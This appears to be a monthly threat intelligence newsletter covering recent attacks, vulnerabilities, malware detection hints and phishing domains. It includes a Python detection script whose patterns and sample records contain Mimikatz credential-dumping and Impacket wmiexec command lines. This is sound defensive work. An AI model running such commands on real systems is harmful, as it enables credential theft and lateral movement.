July Threat Intelligence Review
Threat News
CISA Aware of Multiple Sectors Being Hit by Denial-of-Service Attacks
Security Analyst Recommendations: The last few weeks have seen several major organizations, including Microsoft, suffer service disruptions due to ongoing denial-of-service attacks against them. The group Anonymous Sudan is claiming responsibility for the attacks. They are linked to the Russian government. While most of the attacks have disrupted but not brought down their targets, you can expect more activity from this group, especially as the 2024 election cycle starts.
Sysmon Now Detects Executable Creation
Security Analyst Recommendations: In a big win for security, Microsoft’s free tool Sysmon now detects the creation of executable files on a system. The option is FileExecutableDetected, and it matters because executables are often created later in the exploit chain. If you don’t know what Sysmon is, I highly recommend you look it up. It enhances logging within Windows systems with a performance cost low enough to be unnoticeable in most cases. Enhanced logging is also much appreciated by incident responders, as it often catches parts of typical exploit chains that baseline Windows logging does not record. Also, Sysmon is now a protected process, making it very difficult to disable.
AI linked to new crop of phishing email attacks
Security Analyst Recommendations: We knew it was coming. AI is going to make a lot of things better for security, but it will also help attackers scale their campaigns. In the short term, expect to see a lot of experimenting with AI attack techniques, especially when it comes to social engineering. At first these will not be as sophisticated, but over time they will get better and harder to detect. This will make tools like spam filters less reliable, which will put more emphasis on training and detection tools.
Vulnerabilities and Exploits
A WordPress plugin called Ultimate Member was exploited by attackers to access backend administration across multiple clients. The plugin itself has around 200,000 installs. Groups using this plugin should look for recently added administrator accounts and malicious IP addresses that were accessing the plugin, as listed out in this article. This comes on the heels of several other WordPress vulnerabilities that were recently released and patched.
Security Analyst Recommendations: WordPress is known for its vulnerabilities, and this is not the first time we’ve seen an exploit in a plugin with large-scale use. The main concern here is to ensure that you don’t use the plugin and, if you do, that it was not used to compromise your WordPress infrastructure. This is also a good time to reach out to any third-party management you have contracted for website hosting and maintenance. The issue with WordPress is not so much the vulnerabilities but that you need to actively update your instance to fix them. This can often fall by the wayside, even with third-party management, so it is always a good idea to check and ensure maintenance processes are in place.
Apple released an emergency patch for two zero-click vulnerabilities in iOS. These vulnerabilities were used by Russian state-sponsored hackers to install spyware. Kaspersky wrote a report about the spyware (here), using the name Operation Triangulation because the malware infected multiple different parts of the iOS stack. CISA issued a mandate for all Federal agencies to patch devices, which includes not just mobile devices like the iPhone but Mac devices as well.
Security Analyst Recommendations: A zero-click vulnerability is one that does not require a user to do anything to start the exploit chain. These are very dangerous because once the device is targeted, it is very difficult to prevent the exploit chain from starting. Apple devices are also a blind spot for many organizations due to the lack of mobile device management and the lack of integration between Apple and other IT management platforms. If you are using Apple devices, especially iPads or laptops, update them to the latest version as soon as possible.
330,000 FortiGate Firewalls are still unpatched from CVE-2023-27997. This vulnerability allowed attackers to remotely access networks from external connections and is rated critical. Bishop Fox, a well-known security company, reported that by their estimates around 69% of FortiGate VPN interfaces on the internet are not patched. FortiGate recommends patching immediately, with the patch to fix this vulnerability and others released about a month ago.
Security Analyst Recommendations: Just a friendly reminder that you need to patch your vulnerabilities. These can and will be used, even months after the initial activity, to access your network. While it is very easy to get exhausted by the number of vulnerabilities coming out, limiting your focus to those under active exploitation (such as those listed by CISA here) can help make sure you are taking care of the most important threats.
Notable Cyber Activities
CVE Breakdown
CVE-2023-2834 – WordPress BookIt Plugin Authentication Bypass
CVE-2022-22630 – Mac OS X Arbitrary Code Execution
CVE-2023-3420 – Chrome Code Execution Exploit
Top Malware Usage
Ducktail – Stealer that targets Facebook authentication materials inside browsers.
Possible Detection: Browser using headless parameter to download files.
Mimikatz – attack framework used for credential attacks.
Possible Detection: commands that include lsadump::sam or sekurlsa::logonpasswords
Cobalt Strike – post-exploitation toolkit with multiple features. Recently featured with BlackCat ransomware (Article).
Possible Detection: suspicious use of named pipes and rundll32 to launch SQL Server Client Configuration.
Impacket – library of Python scripts used for post-exploitation attacks.
Possible Detection: normal Windows binary names ending in .py, such as psexec.py or wmiexec.py
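The "Possible Detection" notes above are quick to turn into a process-creation scan. The following is an added example, not code from the newsletter: it applies the Mimikatz, Impacket and headless-browser (Ducktail) heuristics to a handful of constructed Sysmon-style ProcessCreate records. The record layout, the browser list and the sample command lines are assumptions made for the example; the Cobalt Strike named-pipe check is left out because it needs pipe events rather than process events.

```python
import re
from typing import Iterable

# Constructed Sysmon-style ProcessCreate (Event ID 1) records for the example;
# these are sample inputs written here, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c mimi.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"Image": r"C:\Python311\python.exe",
     "CommandLine": r"python.exe wmiexec.py corp/admin:Passw0rd@10.0.0.5"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"chrome.exe" --headless --disable-gpu https://example.invalid/payload.zip'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
]

# Mimikatz module invocations named in the newsletter.
MIMIKATZ_MODULES = ("lsadump::sam", "sekurlsa::logonpasswords")
# Impacket scripts that carry the name of the Windows tool they mimic (from the newsletter).
IMPACKET_SCRIPTS = re.compile(r"\b(?:psexec|wmiexec)\.py\b", re.IGNORECASE)
# Browser image names are an assumption for the example; Firefox uses -headless, Chromium --headless.
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")
HEADLESS = re.compile(r"(?:^|\s)--?headless\b", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def classify(event: dict) -> list[str]:
    """Return the names of every heuristic that fires on one ProcessCreate record."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    hits = []
    if any(module in cmd.lower() for module in MIMIKATZ_MODULES):
        hits.append("mimikatz")
    if IMPACKET_SCRIPTS.search(cmd):
        hits.append("impacket")
    # Ducktail heuristic: a browser started headless and handed a URL to fetch.
    if image in BROWSERS and HEADLESS.search(cmd) and URL.search(cmd):
        hits.append("ducktail-headless-download")
    return hits


def scan(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Return (rule, command line) pairs for every record that matched a heuristic."""
    return [(rule, ev["CommandLine"]) for ev in events for rule in classify(ev)]


if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Substring rules like these are a starting point for a SIEM query, not a replacement for one; expect to tune the browser list and URL check against your own baseline before alerting on them.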
Phishing
Phishing Trends:
· Using fake reply chains to make the email look more legitimate.
· Completed Doc viaSign, fake document signing requests.
· Increased use of Gmail accounts for phishing.
· Use of click trackers within links.
Known Phishing Domains (found across multiple organizations):
· Ohpri.org
· co.delaware.oh.us
· academia-mail.com
· pulstec.co.jp